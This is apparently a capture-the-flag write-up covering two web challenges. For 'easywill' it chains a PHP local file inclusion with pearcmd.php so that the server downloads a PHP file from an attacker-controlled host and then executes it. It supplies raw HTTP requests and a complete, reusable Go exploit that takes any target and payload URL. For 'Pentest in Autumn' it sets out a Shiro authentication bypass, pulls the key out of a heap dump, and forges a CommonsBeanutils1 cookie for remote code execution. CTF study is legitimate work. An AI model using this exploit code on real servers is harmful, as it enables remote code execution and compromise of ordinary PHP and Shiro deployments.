Web

easywill

assign() stores the supplied name=value pair in _vars. view() then calls extract() on _vars, and the extracted $cfile is passed straight to include $cfile, so the included path is attacker-controlled: a local file inclusion. There is no upload, so the plan is to make pearcmd.php download a file of our choosing onto the box and then include it.

This works because the official php Docker images ship pearcmd.php at /usr/local/lib/php/pearcmd.php and no php.ini, which leaves PHP's built-in default register_argc_argv=On in effect. With that setting PHP splits the raw QUERY_STRING on `+` into $_SERVER['argv'] even for web requests. pearcmd.php drops argv[0] (our `name=cfile&value=...&` parameters) and parses the rest as a pear command line, here `install -R /tmp http://xxx.xxx.xxx.xxx:xxxx/test.php`. The install itself fails because test.php is not a package, but by then the file has been fetched into the download directory under the install root, `/tmp/tmp/pear/download/test.php`, which the second request includes.

Step 1: include pearcmd.php so that it downloads test.php from the attacker host (the query string must be sent unencoded, `+` included):

```http
GET /?name=cfile&value=/usr/local/lib/php/pearcmd.php&+install+-R+/tmp+http://xxx.xxx.xxx.xxx:xxxx/test.php HTTP/1.1
Host: eci-2ze2somogz02j0jitc69.cloudeci1.ichunqiu.com
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.44
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,en-GB;q=0.6,fr;q=0.5,zh-TW;q=0.4
Cookie: __jsluid_h=a4f1f1df7c7d63c0eb15ced6fdd9735c; PHPSESSID=c277aac7d9dfe1f26114924396b1fed5
Connection: close
```

Step 2: include the downloaded file:

```http
GET /?name=cfile&value=/tmp/tmp/pear/download/test.php HTTP/1.1
Host: eci-2ze2somogz02j0jitc69.cloudeci1.ichunqiu.com
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.44
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,en-GB;q=0.6,fr;q=0.5,zh-TW;q=0.4
Cookie: __jsluid_h=a4f1f1df7c7d63c0eb15ced6fdd9735c; PHPSESSID=c277aac7d9dfe1f26114924396b1fed5
Connection: close
```
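The two requests above, as an added Go example that is not code from the writeup: it reproduces how PHP turns the query string into $_SERVER['argv'] and what pearcmd.php makes of it, then sends both steps against a target. The pearcmd path, install root and download directory are the ones used in the writeup; the target and attacker URLs are command-line arguments, and the 10.0.0.1 address in the test is made up.

```go
package main

import (
	"fmt"
	"io"
	"net/http"
	"net/url"
	"os"
	"strings"
	"time"
)

// phpArgv mimics php_build_argv(): with register_argc_argv enabled, PHP
// splits the raw QUERY_STRING on every '+' (no URL decoding) to populate
// $_SERVER['argv'] for a web request.
func phpArgv(queryString string) []string {
	return strings.Split(queryString, "+")
}

// pearArgs mimics the start of pearcmd.php, which array_shift()s argv[0]
// (the script name on the CLI; here our own name=...&value=...& parameters)
// and hands the remainder to the pear command parser.
func pearArgs(argv []string) []string {
	if len(argv) == 0 {
		return nil
	}
	return argv[1:]
}

// pearcmdQuery builds the step-1 query string: the LFI parameters first,
// terminated by '&' so the app ignores the trailing tokens, then the pear
// command `install -R <installRoot> <payloadURL>`. Nothing may be
// URL-encoded, or PHP will not see the '+' separators.
func pearcmdQuery(pearcmdPath, installRoot, payloadURL string) string {
	return "name=cfile&value=" + pearcmdPath + "&+install+-R+" + installRoot + "+" + payloadURL
}

// pearDownloadPath is where `pear install -R <root>` leaves a fetched file:
// the default download_dir (/tmp/pear/download) prefixed with the install root.
func pearDownloadPath(installRoot, fileName string) string {
	return strings.TrimRight(installRoot, "/") + "/tmp/pear/download/" + fileName
}

// includeQuery builds the step-2 query string that includes the dropped file.
func includeQuery(path string) string {
	return "name=cfile&value=" + path
}

// getRaw sends GET <base>?<rawQuery> with the query untouched: Go emits
// url.URL.RawQuery verbatim, so the '+' separators survive on the wire.
func getRaw(base, rawQuery string) (int, string, error) {
	u, err := url.Parse(base)
	if err != nil {
		return 0, "", err
	}
	u.RawQuery = rawQuery
	client := &http.Client{Timeout: 15 * time.Second}
	resp, err := client.Get(u.String())
	if err != nil {
		return 0, "", err
	}
	defer resp.Body.Close()
	body, err := io.ReadAll(resp.Body)
	return resp.StatusCode, string(body), err
}

// exploit runs both steps: pearcmd fetches payloadURL (a PHP file on a host
// we control) into the download dir, then the LFI includes it.
func exploit(target, payloadURL string) (string, error) {
	const pearcmd = "/usr/local/lib/php/pearcmd.php"
	if _, _, err := getRaw(target, pearcmdQuery(pearcmd, "/tmp", payloadURL)); err != nil {
		return "", fmt.Errorf("step 1 (pearcmd download): %w", err)
	}
	fileName := payloadURL[strings.LastIndex(payloadURL, "/")+1:]
	_, body, err := getRaw(target, includeQuery(pearDownloadPath("/tmp", fileName)))
	if err != nil {
		return "", fmt.Errorf("step 2 (include): %w", err)
	}
	return body, nil
}

func main() {
	if len(os.Args) != 3 {
		fmt.Fprintln(os.Stderr, "usage: go run . http://target/ http://attacker:port/test.php")
		os.Exit(2)
	}
	body, err := exploit(os.Args[1], os.Args[2])
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	fmt.Print(body)
}
```

If step 2 returns nothing, check that the target actually runs with register_argc_argv on and that nothing between you and the app (a proxy, or a client library) has re-encoded the `+` characters as %2B.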


The flag is at /ffffffff14ggggggg3.

Pentest in Autumn

`/;/actuator` bypasses Shiro's authentication filter: Shiro's path matcher truncates the URI at the `;` and sees the request as `/`, while Spring still dispatches it to `/actuator`, so the actuator endpoints are reachable without logging in.
`/;/actuator/heapdump` returns a heap dump of the JVM.
Open it in Eclipse MAT and run the OQL query
select * from org.apache.shiro.web.mgt.CookieRememberMeManager
The CookieRememberMeManager instance holds the encryptionCipherKey, displayed by MAT as a signed Java byte[].

Converted to Base64 (R3Ml7uNuNB3ioj49tYV0jw==), the key goes into the shiro_attack tool, which forges a rememberMe cookie carrying the CommonsBeanutils1 gadget chain for RCE. CommonsBeanutils1 is the natural choice because shiro-core itself depends on commons-beanutils, so the chain needs no extra library on the target.